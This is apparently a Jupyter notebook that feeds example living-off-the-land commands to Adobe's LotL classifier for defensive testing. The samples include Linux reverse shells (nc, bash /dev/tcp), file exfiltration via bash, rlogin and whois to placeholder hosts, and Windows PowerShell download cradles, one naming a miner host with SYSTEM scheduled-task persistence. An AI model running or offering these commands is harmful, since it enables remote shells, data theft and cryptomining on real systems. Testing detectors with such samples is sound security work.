# HolisticInfoSec LotL Classifier scenario tests

Living off the Land (LotL) Classifier: https://github.com/adobe/libLOL  
Living off the Land (LotL) Classifier Open-Source Project: https://medium.com/adobetech/living-off-the-land-lotl-classifier-open-source-project-b167484c8187

This notebook extends the project's quick start examples to three distinct scenarios (categories) derived from GTFOBins, LOLBAS, and realworld analysis. These include Linux reverse shells, Linux file uploads (exfil), and Windows coin miners.

This effort is supported by the related toolsmith #146 article  https://holisticinfosec.io/post/lotl/

## Linux reverse shell 

In [ ]:
# from GTFOBins: reverse shell examples via nc, gimp, and bash
# https://gtfobins.github.io/#+reverse%20shellc

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['nc -e /bin/sh $RHOST $RPORT',
          'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
          'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("")

## Linux file uploads (exfil)

In [ ]:
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# https://gtfobins.github.io/#+file%20upload

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
          'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
          'whois -h $RHOST -p $RPORT base64 $LFILE']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("")

## Windows coin miners

In [ ]:
# LOLBINS miner commands from https://lolbas-project.github.io/ 
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References: 
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yastcat',
          'rundll32.exe javascript:\..\mshtml,RunHTMLApplication;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://ip:port/);',
          'regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("")